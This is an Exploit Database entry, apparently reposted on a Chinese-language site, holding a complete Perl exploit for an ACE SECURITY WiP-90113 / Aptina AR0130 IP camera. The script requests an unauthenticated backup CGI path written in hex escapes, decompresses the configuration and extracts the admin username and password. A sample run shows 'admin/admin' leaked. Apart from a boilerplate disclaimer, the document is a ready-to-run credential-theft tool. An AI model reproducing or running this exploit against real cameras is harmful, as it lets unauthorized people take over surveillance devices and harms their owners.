Aptina AR0130 960P 1.3MP Camera – Remote Configuration Disclosure

Exploit Database
98 阅读

作者： Todor Donev

日期： 2020-02-24
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/48127/

# Exploit Title: Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure

# Author: Todor Donev

# Date: 2020-02-23

# Vendor: https://acesecurity.jp

# Product Link: https://acesecurity.jp/support/top/wip_series/wip-90113

# CVE: N/A

#!/usr/bin/perl

#ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure

#https://donev.eu/

#Disclaimer:

#This or previous programs are for Educational purpose ONLY. Do not use it without permission.

#The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages

#caused by direct or indirect use of theinformation or functionality provided by these programs.

#The author or any Internet providerbears NO responsibility for content or misuse of these programs

#or any derivatives thereof. By using these programs you accept the factthat any damage (dataloss,

#system crash, system compromise, etc.) caused by the useof these programs are not Todor Donev's

#responsibility.

#Use them at your own risk!

#(Dont do anything without permissions)

# [ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure

# [ ================================================================

# [ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>

# [ Initializing the browser

# [ >>User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)

# [ >>Content-Type => application/x-www-form-urlencoded

# [ <<Connection => close

# [ <<Date => Sat, 22 Feb 2020 14:10:01 GMT

# [ <<Accept-Ranges => bytes

# [ <<Server => thttpd/2.25b 29dec2003

# [ <<Content-Length => 25893

# [ <<Content-Type => application/octet-stream

# [ <<Last-Modified => Sat, 22 Feb 2020 14:10:00 GMT

# [ <<Client-Date => Sat, 22 Feb 2020 14:10:04 GMT

# [ <<Client-Peer => 192.168.200.49:8080

# [ <<Client-Response-Num => 1

# [

# [ Username : admin

# [ Password : admin

use strict;

use HTTP::Request;

use LWP::UserAgent;

use WWW::UserAgent::Random;

use Gzip::Faster 'gunzip';

my $host = shift || ''; # Full path url to the store

my $cmd = shift || ''; # show - Show configuration dump

$host =~ s/\/$//;

print"\033[2J";#clear the screen

print"\033[0;0H"; #jump to 0,0

print "[ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure\n";

print "[ ================================================================\n";

print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";

if ($host !~ m/^http/){

print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";

print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";

exit;

}

print "[ Initializing the browser\n";

my $user_agent = rand_ua("browsers");

my $browser= LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });

$browser->timeout(30);

$browser->agent($user_agent);

# my $target = $host."/config_backup.bin";

# my $target = $host."/tmpfs/config_backup.bin";

my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";

my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);

my $response = $browser->request($request) or die "[ Exploit Failed: $!";

print "[ >>$_ => ", $request->header($_), "\n" for$request->header_field_names;

print "[ <<$_ => ", $response->header($_), "\n" for$response->header_field_names;

print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);

my $gzipped = $response->content();

my $config = gunzip($gzipped);

print "[ \n";

if ($cmd =~ /show/) {

print "[ >> Configuration dump...\n[\n";

print"[ ", $_, "\n" for split(/\n/,$config);

exit;

} else {

print"[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);

print"[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);

exit;

}